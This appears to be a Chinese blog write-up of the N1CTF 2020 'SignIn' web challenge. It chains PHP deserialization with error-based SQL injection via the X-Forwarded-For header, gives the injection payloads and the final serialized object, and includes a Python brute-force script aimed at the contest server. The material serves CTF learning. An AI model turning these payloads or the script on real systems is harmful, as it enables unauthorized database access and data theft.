N1CTF2020 Web SignIn-wp

最新推荐文章于 2023-10-27 22:21:21 发布
最新推荐文章于 2023-10-27 22:21:21 发布
阅读量1k 收藏
点赞数 3
分类专栏: ctf php序列化 文章标签: ctf php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46091464/article/details/109180810
版权

报名了N1CTF 结果没有做 有点后悔 最后才看wp跟着做一次 还有谢谢atao师傅提供的脚本。
看来自己也要学习一下怎么写简单的脚本啦。

一. 源代码

<?php 
class ip {
    public $ip;
    public function waf($info){//设置waf
    }
    public function __construct() {
        if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){
            $this->ip = $this->waf($_SERVER['HTTP_X_FORWARDED_FOR']);//参数可以控制
        }else{
            $this->ip =$_SERVER["REMOTE_ADDR"];
        }
    }
    public function __toString(){//当一个对象被当作一个字符串被调用。
        $con=mysqli_connect("localhost","root","********","n1ctf_websign");
        $sqlquery=sprintf("INSERT into n1ip(`ip`,`time`) VALUES ('%s','%s')",$this->waf($_SERVER['HTTP_X_FORWARDED_FOR']),time());
        if(!mysqli_query($con,$sqlquery)){
            return mysqli_error($con);
        }else{
            return "your ip looks ok!";
        }
        mysqli_close($con);
    }
}
class flag {
    public $ip;
    public $check;
    public function __construct($ip) {
        $this->ip = $ip;
    }
    public function getflag(){
    	if(md5($this->check)===md5("key****************")){
    		readfile('/flag');
    	}
        return $this->ip;
    }
    public function __wakeup(){//反序列化会执行__wakeup魔法函数利用点
        if(stristr($this->ip, "n1ctf")!==False)
            $this->ip = "welcome to n1ctf2020";
        else
            $this->ip = "noip";
    }
    public function __destruct() {
        echo $this->getflag();
    }

}
if(isset($_GET['input'])){
    $input = $_GET['input'];
	unserialize($input);//进行反序列化利用点
}

上面简单的分析了一下源代码,思路就是进行控制X-Forwarded-For参数进行sql注入到key,然后进行获得flag

二. 分析代码

我们可以看到输入的input进行反序列化操作这样就会调用__wakeup()魔法函数,又因为__wakeup()魔法函数里面stristr()函数,这个函数是忽略大小写字符串的查询。

但是我们要利用的是ip类的__toString()方法进行sql注入。所以如果我们将stristr()函数里面的ip参数换成ip类,这样就会调用ip类的__toString()方法从而执行sql注入

$a = new flag(new ip());
echo $a;
#O:4:"flag":2:{s:2:"ip";O:2:"ip":1:{s:2:"ip";N;}s:5:"check";N;}

如果我们注入到key就成功可以成功获得flag
接下来就是进行sql注入啦

三. sql注入原理分析

这里进行sql注入原理分析需要结合ip类和flag类一起看

#ip类的__toString方法
    public function __toString(){
        $con=mysqli_connect("localhost","root","********","n1ctf_websign");
        $sqlquery=sprintf("INSERT into n1ip(`ip`,`time`) VALUES ('%s','%s')",$this->waf($_SERVER['HTTP_X_FORWARDED_FOR']),time());
        if(!mysqli_query($con,$sqlquery)){//错误就返回错误信息
            return mysqli_error($con);
        }else{//正确就返回"your ip looks ok!"
            return "your ip looks ok!";
        }
        mysqli_close($con);
    }

#flag类的__wakeup()方法
    public function __wakeup(){
        if(stristr($this->ip, "n1ctf")!==False)//寻找字符串"n1ctf"存在
            $this->ip = "welcome to n1ctf2020";
        else
            $this->ip = "noip";
    }
#存在就返回"welcome to n1ctf2020",不存在就返回"noip"

在flag类里面的stristr($this->ip, "n1ctf")中的$this->ip的值是进行SQL语句执行后的返回值,意思就是如果ip类的sql语句执行成功就返回"your ip looks ok!"然后不存在"n1ctf"字符串,最后返回页面的就是noip。如果sql语句执行失败就会返回失败信息,如果信息里面有"n1ctf"就会页面输出welcome to n1ctf2020

通过上面分析,发现正常是插入sql语句是不行的,如果要利用就必须让sql语句执行不成功。而且可以进行判断0或1。所以我们就可以使用报错注入。
在这里插入图片描述

#sql payload
select  updatexml(1,concat('~',(select if((1=1),'n1ctf',0)),'~'),1);

#exp
' or updatexml(1,concat('~',(select if((1=1),'n1ctf',0)),'~'),1) or '

这样我们就可以进行报错注入啦,最后就是闭合单引号。

在这里插入图片描述

四. Payload

#思路
数据库:n1ctf_websign

获得表
'or updatexml(1,concat('~',(select if((substring((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1)='n'),'n1ctf',0)),'~'),1) or '
#n1ip,n1key

获得字段
'or updatexml(1,concat('~',(select if((substring((select group_concat(column_name) from information_schema.columns where table_name='n1key'),1,1)='i'),'n1ctf',0)),'~'),1) or '
#ip,key

获得key值
'or updatexml(1,concat('~',(select if((substring((select `key` from n1key),1,1)='n'),'n1ctf',0)),'~'),1) or '
#n1ctf20205bf75ab0a30dfc0c

#最后payload
?input=O:4:"flag":2:{s:2:"ip";O:2:"ip":1:{s:2:"ip";N;}s:5:"check";s:25:"n1ctf20205bf75ab0a30dfc0c";}

#  -*- coding: utf-8 -*-
# @Author: atao
import requests

url = 'http://101.32.205.189/?input=O:4:"flag":1:{s:2:"ip";O:2:"ip":0:{}}'
dic = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM0123456789-+{}="
flag=''

for j in range(1, 20):
    #for m in dic:
    for m in range(48,126):
        headers = {
            'X-Forwarded-For': "'or updatexml(1,concat('~',(select if((substring((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1)='{}'),'n1ctf',0)),'~'),1) or '".format(j,chr(m))
            #'X-Forwarded-For': "'or updatexml(1,concat('~',(select if((substring((select group_concat(column_name) from information_schema.columns where table_name='n1key'),{},1)='{}'),'n1ctf',0)),'~'),1) or '".format(j, m)
            #'X-Forwarded-For': "'or updatexml(1,concat('~',(select if((substring((select `key` from n1key),{},1)='{}'),'n1ctf',0)),'~'),1) or '".format(j,m)

        }
        res = requests.get(url=url, headers=headers)
        #res = requests.get(url=url, headers=headers)
        #print res.text
        if "<code>welcome to n1ctf2020</code>" in res.text:
            flag = flag + chr(m)
            break
    print flag

五. 总结

学习了新姿势序列化配合sql注入
还有就是脚本学习hhh~

希望对您有帮助~

Firebasky
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
【N1CTF】Oflo WriteUp
古月浪子的博客
10-22 506
二进制文件里面有很多call+e8+jmp+[return address += 1]这种操作,导致IDA无法处理,直接F5出来的几乎不能看,索性手动nop一下 对sub_400A69前10个字节进行动态patch,异或的内容是输入的前5个字符,根据flag的格式,猜测是n1ctf,IDAPython脚本: a='n1ctf' for i in range(10): PatchByte(0x400a69+i,Byte(0x400a69+i)^ord(a[i%5])) 跑完脚本以后可以正常F5该函
N1CTF Junior 2024 Web Official Writeup(Nu1L Team组织的官方纳新赛事,旨在选拔优秀人才加入Nu1L Team
最新发布
04-08 900
小北觉得这一次的N1 Junior的题大部分都有个共同性,就是二次思维,也就是单次Attack无法达到利用,那就double attack!!!自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
青少年CTF-web-signin
m0_63047884的博客
12-17 666
qsnctf-web-easy-signin,pathinfo漏洞上传绕过
n1ctf2020-web-signin
veinard_F的博客
10-20 682
水平不够,复现困难,先做个简单的记录,,, 题目源码: class ip { public $ip; public function waf($info){ } public function __construct() { if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){ $this->ip = $this->waf($_SERVER['HTTP_X_FORWARDED_FOR'])
oflo ---- N1ctf 2020
Misaka10046的博客
10-27 563
首先打开程序,发现是个ELF文件,然后打开IDA找到main函数按F5试图反汇编,但是按了一下,发现好像不行。 然后看到下面有一串花指令,随手去掉。 然后发现上面有一堆数据,按c进行编译
【打酱油】N1CTF部分WP
weixin_33895604的博客
03-12 185
周末围观神仙们打架,自己也做了几题,也是有所收获的,在这里记录一下。http://n1ctf.xctf.org.cn/ N1CTF.png 0x00 checkin 这是一道签到题 image.png image.png 加入IRC频道拿到base64,encode即可拿...
CTF-All-In-One 20171015
10-15
CTF-All-In-One 20171015 CTF-All-In-One 20171015 一本 CTF 领域的大杂烩指南
CTF 竞赛入门指南(ctf-all-in-one).pdf
09-07
一、基础篇;二、工具篇;三、分类专题篇;四、技巧篇;五、高级篇;六、题解篇;七、实战篇... 2000多页的电子书,讲解细致,值得搜藏。
ctf-all-in-one.pdf
05-25
CTF-All-In-One(CTF 从入门到放弃) ——“与其相信谣言,不如一直学习。”ctf基础加入门题
CTF-5#进击!拿到Web最高权限-WP
10-23
CTF/Web安全/ WP最高权限获取 CTF(Capture The Flag)是一种信息安全竞赛形式,目的是为了让参与者通过解决各种挑战和谜题来获取 Flags,证明自己的信息安全能力。WPWeb)是CTF中的一种挑战形式,旨在让参与者...
ctfweb攻防工具-御剑1.5.7z
04-06
【御剑】是一款知名的Web安全扫描工具,常用于CTF(Capture The Flag)竞赛和网络安全检测。CTF是一种信息安全竞赛,参与者通过展示攻击与防御技术来争夺“旗标”,即获取或保护特定的信息资源。在这样的竞赛中,Web...
N1Script:N1脚本
05-09
N1Script 开源服务端和客户端源码 更新记录: 2019.12.16 v2.10 1.添加倒计时功能 2019.12.14 v2.9 1.添加服务器设置历史记录 2.添加github主页跳转按钮 2019.12.13 v2.8 (需更新服务端及手机端) 1.修改定时为单控模式 2019.12.6 v2.6(需更新服务端及手机端) 1.添加周期执行功能 2.优化数据请求成功率,修改数据请求为http协议,原tcp连接只做推送(完成部分) 现在需要使用3个端口,8000连接dc1,8800连接手机,8880作为http请求端口 2019.9.23 v2.3(需更新服务端及手机端) 1.添加星期定时功能 2.添加验证token 3.修复android 9升级异常 2019.9.3 1.添加定时功能 2019.8.26 1.添加在线升级 2019.8.22 1.添加本地数据库保存,默认路径为
[2021N1CTF国际赛]Easyphp-Wp
Y4tacker的博客
11-22 2888
文章目录写在前面Wp简单分析小实验验证猜想可效性构造tar参考文章 写在前面 在各种带飞的情况下,web被带ak了,这里比较想写一个easyphpwp,这题到结束也只有14个解,其他的懒得写了,本文也只是简单分析 Wp 简单分析 看看首页源码 再看这里很明显是触发phar反序列化 如何插入数据是一个问题,这里没有上传,再看log.php 关键部分源码是这个,我们就应该去想如何去构造,这里phar太难搞了,具体可以看看官方文档关于他的结构,后面最后四位肯定是GBMB多一位都不行,这里想到了tar,本来
N1CTF2022 WEB题3道java WP(OldFasjson那题待更新)
m0_61206225的博客
11-08 1083
N1CTF2022 WEB题3道java WP(OldFasjson那题待更新)
ctfshow愚人杯-web-wp
qq_46570234的博客
04-03 1522
4月1日-4月2日愚人杯部分webWP,包括侥幸过的非预期解的“被遗忘的反序列化”
电子科大CTF安全萌新赛部分WP
Arcadios的博客
03-31 3214
只做了WEB和MISC的一部分,下面是wp WEBXSS1F12一下看到这题是在input标签里XSS,所以先用”>闭合value就行了,我写的是"><script>alert(document.domain)</script> 灵梦的钱罐 题目里说十万元可以干任何事,于是postmoney=100000 拿到flag:cnss{G00d_1uck_Hav3_Fun}Nothing Here 这题
N1CTF 2023 pwn_n1array
qq_62172019的博客
10-27 198
N1CTF2023 pwn_n1array
日语N1考试
漫步量化
10-11 939
Japanese grade N1 日语N1级,日本语能力测试(JLPT)最高等级。 考试时间 一年两次,7月和12月第一个星期日上午。 N1分数 及格分 级别 合格分 语言知识(文字、词汇、语法) 阅读 听力 N1 100分 19分 19分 19分 N2 90分 19分 19分 19分 N3 95分 19分 19分 19分 2019年12月...
【BUUCTF】N1BOOK WEB WP
aoao331198的博客
03-29 2221
文章目录常见的搜集粗心的小李SQL注入-1SQL注入-2afr_1afr_2 常见的搜集 粗心的小李 git泄露,用scrabble工具得到一个网页打开即可 SQL注入-1 SQL注入-2 afr_1 afr_2
ctf工具之binwalk--windows下(misc).rar
07-30
binwalk是一款用于分析和提取嵌入在二进制文件中的文件和数据的工具。对于CTF比赛来说,binwalk可以帮助我们进行文件的分析和提取,从而更好地理解题目并解决问题。 在Windows下使用binwalk,我们首先需要在官方网站(https://github.com/ReFirmLabs/binwalk)下载并安装binwalk的Windows版本。安装完成后,我们可以在命令行中使用binwalk命令进行操作。 拿到CTF题目中的misc.rar文件后,我们可以使用binwalk来分析该文件。在命令行中,我们输入以下命令: binwalk misc.rar binwalk会对该文件进行分析,并将分析结果显示在命令行中。它会检测并提取出文件中的隐藏信息,并尝试识别文件中可能存在的其他类型文件(如图像、压缩包等)。 除了显示分析结果外,binwalk还支持提取文件中的隐藏文件。我们可以使用以下命令来提取隐藏文件: binwalk -e misc.rar 这会将隐藏在misc.rar中的文件提取到当前目录中。我们可以通过查看提取出的文件来获得进一步的线索或解答。 总之,binwalk是一款强大的CTF工具,它可以帮助我们分析和提取嵌入在二进制文件中的文件和数据。在Windows下使用binwalk可以通过命令行进行操作,从而更好地解决CTF比赛中的问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值